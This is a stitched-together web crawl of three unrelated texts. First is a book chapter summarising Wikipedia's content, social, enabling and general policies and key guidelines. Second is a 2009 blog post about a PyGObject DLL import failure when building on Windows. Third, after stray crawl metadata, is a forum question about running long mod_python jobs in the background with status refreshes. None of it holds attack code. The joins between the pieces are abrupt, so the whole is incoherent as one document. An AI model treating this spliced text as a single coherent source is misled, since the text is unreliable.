Policies fall into a few classes. Some deal with article content, and others deal with editor interactions. We've broken them down into four types for convenience.
Content Policies
Content policies deal with article content, both what articles should be and what you can do with them.
- Attack Page (ATP)
Aggressive, hostile, biased articles will be summarily deleted.
- Biographies of Living Persons (BLP)
From Wikipedia: Wikipedia articles can affect real people's lives. This gives us an ethical and legal responsibility. Biographical material must be written with the greatest care and attention to verifiability, neutrality, and avoiding original research, particularly if it is contentious.
- Copyrights (C)
Wikipedia operates under a copyleft approach to its content, with the copyright to contributions remaining with those who created them. (See Chapter 2, The World Gets a Free Encyclopedia for more on copyleft.)
Wikipedia actively removes copyrighted material.
- Editing Policy (EP)
From Wikipedia: Improve pages wherever you can, and do not worry about leaving them imperfect.
- Libel (LIBEL)
Wikipedia removes any defamatory material it finds, responds to email requests to do so, and regards editors adding libelous material as being responsible for that content.
- Naming Conventions (NAME)
From Wikipedia: Generally, article naming should prefer what the majority of English speakers would most easily recognize, with a reasonable minimum of ambiguity, while at the same time making linking to those articles easy and second nature.
- Neutral Point of View (NPOV), Neutral Point of View/FAQ (NPOVFAQ)
From Wikipedia: All Wikipedia articles and other encyclopedic content must be written from a neutral point of view, representing views fairly, proportionately, and without bias.
- Non-Free Content Criteria (NFCC)
This policy attempts to delimit the use of non-free content (such as fair-use images) on Wikipedia.
- No Original Research (NOR)
From Wikipedia: Wikipedia is not a publisher of original thought. Articles should only contain verifiable content from reliable sources without further analysis. Content should not be synthesized to advance a position.
- Ownership of Articles (OWN)
From Wikipedia: If you create or edit an article, know that others will edit it, and within reason, you should not prevent them from doing so.
- Reusing Wikipedia Content (REUSE)
Wikipedia material may be re-used by anyone, within the terms of the GFDL.
- Verifiability (V)
From Wikipedia: Material that is challenged or likely to be challenged, and all quotations, must be attributed to a reliable, published source.
Social Policies
Social policies deal with how editors should behave and interact with one another on the site.
- Civility (CIVIL)
From Wikipedia: Participate in a respectful and civil way. Do not ignore the positions and conclusions of others. Try to discourage others from being uncivil, and be careful to avoid offending people unintentionally.
- Edit War (EW)
From Wikipedia: If someone challenges your edits, discuss it with them and seek a compromise, or seek dispute resolution. Don't just fight over competing views and versions.
- No Legal Threats (LEGAL)
From Wikipedia: Do not make threats or claims of legal action against users or Wikipedia itself on Wikipedia. If you have a dispute with the Community or its members, use dispute resolution. A polite report of a legal problem such as defamation or copyright infringement is not threatening and will be acted on quickly. If you do choose to take legal action, please refrain from editing until it is resolved and note that your user account may be blocked.
- No Personal Attacks (NPA)
From Wikipedia: Comment on content, not on the contributor.
- Dispute Resolution (DR)
Try to avoid arguments; if in a dispute, talk it over calmly and consider your words first.
- Sock Puppetry (SOCK)
From Wikipedia: Do not use multiple accounts to create the illusion of greater support for an issue, to mislead others, or to circumvent a block. Do not ask your friends to create accounts to support you or anyone else.
- Three-Revert Rule (3RR)
From Wikipedia: Edit warring is harmful. Wikipedians who revert a page in whole or in part more than three times in 24 hours, except in certain special circumstances, are likely to be blocked from editing.
- Vandalism (VANDAL)
From Wikipedia: Intentionally making repeated non-constructive edits to Wikipedia will result in a block or permanent ban.
- Wheel War (WHEEL)
Applies only to administrators. Repeatedly reversing actions of other administrators is considered harmful.
Enabling Policies
These are basic documents on which various processes and administrator actions rely. For example, under the Username policy (UN), accounts with unsuitable usernames will be blocked. These policies are often intended for specific situations.
- Arbitration Policy (AP)
See Chapter 14, Disputes, Blocks, and Bans for details on Arbitration, which is a high-level dispute resolution process.
- Appealing a Block (APPEAL)
This policy mentions all the correct appeal routes available to a user blocked by an administrator.
- Banning Policy (BAN)
This policy explains why and how editors are excluded from the site.
- Blocking Policy (BP), Appealing a Block (APB)
From Wikipedia: Users may be blocked from editing by an administrator to protect Wikipedia and its editors from harm.
- Bot Policy (BOT)
This is a procedural guide to automated editing.
- Category Deletion Policy (CDP)
This is a policy for the named process.
- Criteria for Speedy Deletion (CSD)
This is a very detailed list of the criteria used by administrators to delete articles quickly.
- Deletion Policy (DEL)
From Wikipedia: Deletion and undeletion are performed by administrators based on policy and guidelines, not personal likes and dislikes. There are four processes for deleting items and one post-deletion review process. Pages that can be improved should be edited or tagged, not nominated for deletion.
- Image Use Policy (IUP)
From Wikipedia: Be very careful when uploading copyrighted images, fully describe images' sources and copyright details on their description pages, and try to make images as useful and reusable as possible.
- Open Proxies (PROXY)
Administrators may block open or anonymizing proxy servers that allow you to edit while hiding your IP address.
- Office Actions (OFFICE)
From Wikipedia: Sometimes the Wikimedia Foundation may have to delete, protect, or blank a page without going through the normal site/community process(es) to do so. These edits are temporary measures to prevent legal trouble or personal harm and should not be undone by any user.
- Open Ticket Request System (OTRS)
This document describes the operation of the Open Ticket Request System, which handles email complaints to Wikipedia.
- Oversight (OVER)
This is actually a Foundation-level policy. It describes the Oversight system for removing edits from page histories, with scope to deal with personal information, defamation, and copyright only.
- Proposed Deletion (PROD)
From Wikipedia: As a shortcut around AfD [i.e., Articles for Deletion] for uncontroversial deletions; an article can be proposed for deletion, though once only. If no one contests the proposal within five days, the article may be deleted by an administrator.
- Protection Policy (PROT)
This policy covers administrator use of the power to protect pages by locking editing.
- Username Policy (UN)
From Wikipedia: When choosing an account name, be careful to avoid names which may be offensive, confusing, or promotional. You are encouraged to use only one account.
General Policies
These core policies apply across the site, to both content and social situations.
- Consensus (CON)
From Wikipedia: Consensus is Wikipedia's fundamental model for editorial decision-making. Policies and guidelines document communal consensus rather than creating it.
- GNU Free Documentation License (GFDL)
This is the license under which Wikipedia is released. The general outline is covered in Chapter 2, The World Gets a Free Encyclopedia, but material on secondary and invariant sections and cover texts, although not so relevant to Wikipedia, may have an effect on imported GFDL material.
- Ignore All Rules (IAR)
Wikipedia is not a rule-bound place, and the rules should serve the mission. Occasionally, editors can operate outside policy, if they are acting within common sense.
- What Wikipedia Is Not (NOT)
This policy defines Wikipedia's mission by describing what it isn't; this is a key reference.
It Used to Be So Much Simpler
The earliest version of Wikipedia:Policies and guidelines dates back to April 17, 2002 (though an earlier version, just called Wikipedia policy, dates back to 2001; the very earliest history was lost due to technical glitches). Much of the original content is now considered part of the style guide and doesn't relate to policy as such. Wikipedia:Most common Wikipedia faux pas is still available and useful to know about; it is now under the title Wikipedia:Avoiding common mistakes (shortcut WP:ACM). Wikipedia:Always leave something undone was renamed Wikipedia:Make omissions explicit, but this is no longer policy. Wikipedia:Look for an existing article before you start one was emphasized earlier in the book; this policy was merged into Wikipedia:How to start a page about a year later. Wikipedia:Contribute what you know or are willing to learn more about has the nostalgic feel of older wikis; this page also didn't turn into policy. If depressed by the comparison, try Wikipedia:What Wikipedia is not/Outtakes.
List of Guidelines
This is a selective list of some guidelines we consider particularly important. There are over a hundred guidelines total, many of which are part of the Manual of Style (you can find a complete collection of guidelines in the Wikipedia guidelines category). Summaries for interesting guidelines tend to be significantly longer than for official policies. They are often saying something important but more diffuse. They are certainly more rewarding to read casually.
Assume Good Faith (AGF)
From Wikipedia: Unless there is strong evidence to the contrary, assume that people who work on the project are trying to help it, not hurt it. If criticism is needed, discuss editors' actions, but it is not ever necessary nor productive to accuse others of harmful motives.
Attribution (ATT)
This policy is not current, but it is of particular interest as an attempt to unify NOR and V. From Wikipedia: All material in Wikipedia must be attributable to a reliable, published source.
Autobiography (AUTO)
From Wikipedia: Avoid writing or editing an article about yourself, other than to correct unambiguous errors of fact.
Be Bold (BOLD)
From Wikipedia: If you see something that can be improved, do not hesitate to do so yourself.
Conflict of Interest (COI)
From Wikipedia: When an editor disregards the aims of Wikipedia to advance outside interests, they have a conflict of interest. Conflict of interest editing is strongly discouraged, but editors with a potential conflict of interest may edit with appropriate care and discussion.
Do Not Disrupt Wikipedia to Illustrate a Point (POINT)
From Wikipedia: If you think you have a valid point, causing disruption is probably the least effective way of presenting that point, and it may get you blocked.
This applies particularly to those with a grievance or burning issue to raise. Attention-seeking tactics that have a negative impact on others are not acceptable as a campaigning measure. Such disruption is generally considered actionable and can lead to a ban.
Etiquette (EQ)
This is a general guide to expected etiquette on the site.
Harassment (HARASS)
From Wikipedia: Do not stop other editors from enjoying Wikipedia by making threats, nitpicking good-faith edits to different articles, repeated personal attacks, or posting personal information.
Manual of Style (MOS)
This is the Manual of Style for articles, with all its many subpages that detail specific style guide issues.
Notability (N)
From Wikipedia: A topic is presumed to be notable if it has received significant coverage in reliable secondary sources that are independent of the subject.
Note: Despite its daily use in discussions, Notability has not received recognition as official policy. Many people clearly feel that the definition, by means of sources, is flawed and thus still controversial.
No Disclaimers in Articles (NDA)
From Wikipedia: Disclaimers should not be used in articles. All articles are covered by the five official disclaimer pages.
Please Do Not Bite the Newcomers (BITE)
From Wikipedia: Do not be hostile toward newcomers. Remember to assume good faith first and approach them in a polite manner.
This guideline gives a code of conduct for dealing with inexperienced editors. Although they may come across as clueless newbies, they should be treated with understanding and should certainly not be addressed in those terms. The correct approach is to be tactful and helpful, drawing the attention of such editors to any general matters of policy, custom, and convention which they are apparently unaware of.
Polling Is Not a Substitute for Discussion (VOTE)
From Wikipedia: Wikipedia decisions are not made by popular vote, but rather through discussions by reasonable people working toward consensus. Polling is only meant to facilitate discussion and should be used with care.
Reliable Sources (RS)
From Wikipedia: Articles should be based on reliable, third-party, published sources with a reputation for fact-checking and accuracy.
SPAM
This is the guideline against promotional articles, linkspam (external links placed to benefit other websites), and excessive internal posting of messages on user talk pages.
Avoid Instruction Creep
WP:CREEP, although not a proper guideline, has an interesting point to make: The fundamental fallacy of instruction creep is thinking that people read instructions.
Seven Policies to Study
The five pillars are a good place to begin to familiarize yourself with Wikipedia principles. Perhaps they will live up to the resonant name and serve as a timeless description of Wikipedia, or perhaps they'll just be eternal by Internet-time standards. Policy does evolve, and Wikipedia evolves, too. Before you say you understand the site policies, you might want another perspective. Everyday life on the site will convince you that participating is not quite so simple.
Here is our selection, based on sheer utility, of the major policies to familiarize yourself with first:
- Neutrality (NPOV) from the content policies
- Three-Revert Rule (3RR) and Civility (CIVIL) from the social policies
- Criteria for Speedy Deletion (CSD) from the enabling policies
- What Wikipedia Is Not (NOT) from the general policies
Together, these policies convey the same ideas as the five pillars but are a little more current in their emphasis. Criteria for Speedy Deletion (CSD) is now used in an aggressive fashion to clean up newly created articles that don't meet Wikipedia's standards at all. Therefore, a new editor should know about this policy.
To summarize, be a neutral, civil editor who doesn't rely on reverting pages excessively. Understand that Wikipedia provides space online for its mission to write an encyclopedia and for no other reason, and understand that many submissions of new pages will be deleted summarily from the site because they don't fit the content policies.
That's five policies. Two guidelines may also affect you as soon as you start editing: Conflict of Interest (COI) and Reliable Sources (RS). For obvious reasons, not every guideline can be covered in detail, but these two are very important.
Conflict of Interest
This guideline, at Wikipedia:Conflict of interest, matters because Wikipedia articles should not be hijacked by outside interests. Editors acting for corporations or religious groups are not welcome to edit articles about those companies or groups in such a way as to control the content. No article should be marred by long edit wars involving partisan editors with a definite stake in the topic. The COI guideline is relatively new but has become important because many people would like to exploit Wikipedia's pages. The guideline says simply that editors of Wikipedia should not put their outside interests ahead of those of the encyclopedia. The best way to ensure that is to edit as little as possible in areas too close to your own interests. That includes self-promotion, ensuring favorable coverage of a company that has hired you, and certain types of activism. The guideline is not intended to prevent academics from editing in their field, members of major political parties from editing about related political affairs, or believers editing about their religion, as long as these edits respect the Neutral Point of View policy.
Reliable Sources
Wikipedia:Reliable sources addresses sources and citations on three fronts: the piece of work being cited, its author, and how it is published. First, all sources cited must certainly be published, so an unpublished conversation or email—what academics call a private communication—should not be used as a source. Second, published work has limitations: A self-published book is not a reliable source for factual information in general. Furthermore, websites vary widely in reliability. For the most part, blogs are not acceptable sources. Content on other wikis cannot be taken as authoritative. Online copies of newspaper articles are as good as the hard copy, but newspapers are reliable sources only if they are part of the mainstream press. In practice, high standards of source reliability have to be met if you want to write about controversial matters or (particularly) about living people.
- Further Reading
- List of all official policies
- Category for Wikipedia guidelines
Compiling PyGObject on Windows
January 5th, 2009 — gianmt
It has been a nightmare from the beginning….
Starting from the new release of Gobject bindings a lot has changed, we now have a new namespace glib where a lot of classes have been moved, of course retaining backward compatibility.
The new library (libpyglib) needs to be shared and not static, so I changed a couple of lines in Makefile.am to build it as a shared lib, basically adding -no-undefined in libpyglib_2_0_la_LDFLAGS, so far so good, the linker is much more happy.
The second problem came when the Python libs were not linked against this new library; after some research I came across a modification to the macro AM_CHECK_PYTHON_HEADERS in gnome-python-extras that Armin Burgmeier made, taking it from a modified version by Murray Cumming… it looks like we do a lot of copy/paste on these things.
So now I have got my $(PYTHON_LDFLAGS) to add to libpyglib_2_0_la_LIBADD and also to the other modules (glib, gio and gobject), so far so good.
Now I can get it to compile; the DLLs are created, and I can rename them to the .pyd extension which Python expects to have, so far so good.
Now when I try to import one of those modules from python I get:
>>> import glib Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/opt/python25/Lib/site-packages/gtk-2.0/glib\__init__.py", line 30, in <module> from glib._glib import * ImportError: DLL load failed: The specified module could not be found. >>>
Now I see two different problems here. Obviously the first one is that libpyglib-2.0.dll is not found, even though it's in the right place, C:\opt\Python25\DLLs; the second problem is that there is a path hardcoded (/opt/python25/Lib/site-packages/gtk-2.0/glib\__init__.py) and I don't understand why that is.
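One thing still on my list to try (an assumption on my part, not verified): Windows resolves dependent DLLs through PATH rather than LD_LIBRARY_PATH, so the directory holding libpyglib-2.0.dll has to be on the PATH of whatever process launches python.exe, e.g. from the MSYS shell:

export PATH=/c/opt/Python25/DLLs:$PATH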
My .profile looks like this:
export PATH=/opt/gnome2/bin:/opt/svn/bin:/opt/python25:$PATH export LD_LIBRARY_PATH=/opt/gnome2/lib export PKG_CONFIG_PATH=/opt/gnome2/lib/pkgconfig:/c/opt/python25/lib/pkgconfig export ACLOCAL_FLAGS="-I /opt/gnome2/share/aclocal" export CC='gcc -mms-bitfields -mthreads' export CPPFLAGS='-I/opt/gnome2/include -I/opt/gnuwin32/include -I/opt/python25/include' export CFLAGS=-g export LDFLAGS='-L/opt/gnome2/lib -L/opt/gnuwin32/lib' export am_cv_python_pythondir=/opt/python25/Lib/site-packages export am_cv_python_pyexecdir=/opt/python25/Lib/site-packages
I run autogen like this:
$ ./autogen.sh --prefix=/opt/Python25 --disable-docs
If someone has got ideas please help
|
http://blogs.gnome.org/gianmt/
|
crawl-002
|
refinedweb
| 423
| 59.03
|
Hi all,
I'm on my way of setting up a web server using mod_python. The user fills out a form, the data is passed to a Python script, the result is presented to the user, done -- sounds pretty simple.
In the first version, I used <form action="run.py" ...>. In the run.py script I get the parameters
def index(req):
params = req.form
and write something like
req.content_type = "text/html"
req.write('''<html>
<head><title>Your request is being processed.</title>
...'''
After some preprocessing the data is finally passed to the actual pipeline:
pipe = apache.import_module("pipeline.py")
pipe.runme(some,params,here, req)
This script sends status messages to req in between all the calculations it has to do. In the end the user gets a link to his result directory and the run.py script finishes with return.
That worked fine for the start, but it seems a bit awkward that the page is loading during the whole time the process needs to finish (~10 min). Mac's Safari by default has a time-out after 1 min, then it stops loading, so I had to come up with something different.
The next idea was to use a system call, appending an ampersand so as not to wait for the process to finish:
os.system("python pipeline.py %s/ &" % jobdir)
With the downside that I have to turn all the Python list and dict objects into text or use the pickle module to pack them and load them again in the script. Also, I cannot send status messages from the long-running process.
After that I tried to use os.fork() but ended up with a lot of processes that were not finished properly and high CPU usage.
I read something about double-fork/detaching/daemonizing, but did not entirely get it and think there must be a simpler way to do it.
It's quite common to have a page refreshing every 10 seconds, checking for new results or status messages, while the time-consuming job is running. But I could not find a simple tutorial on how to do that with mod_python. Can someone help me out? I'd be very happy. Sorry if I wrote too much...
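Roughly what I have in mind, as a sketch only (untested; the handler names, the status file name, and the jobdir parameter are made up):

import os
import subprocess

def start(req, jobdir):
    # kick off the long-running pipeline without waiting for it;
    # the worker is expected to append progress lines to <jobdir>/status.txt
    subprocess.Popen(["python", "pipeline.py", jobdir])
    return status(req, jobdir)

def status(req, jobdir):
    req.content_type = "text/html"
    path = os.path.join(jobdir, "status.txt")
    if os.path.exists(path):
        text = open(path).read()
    else:
        text = "starting..."
    # the meta tag makes the browser re-request this page every 10 seconds
    return ('<html><head><meta http-equiv="refresh" content="10"></head>'
            '<body><pre>%s</pre></body></html>' % text)

That would sidestep the time-out, since each request returns immediately, but I don't know if it is the recommended mod_python way.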
I read some similar (but not quite) questions, but all suggestions on them seem to have their own problems. But they were mostly old threads, and maybe something has happened in the last few years, so that there is now a safe and feasible way to do it.
-- One last 'bonus' question: if the user decides (based on the intermediate results that are presented to him) that he does not want to wait for the analysis, he might leave the page or start over with a new analysis using different parameters. Is it possible to stop the running script then?
Thanks for sharing your time and wisdom.
Best regards,
Anne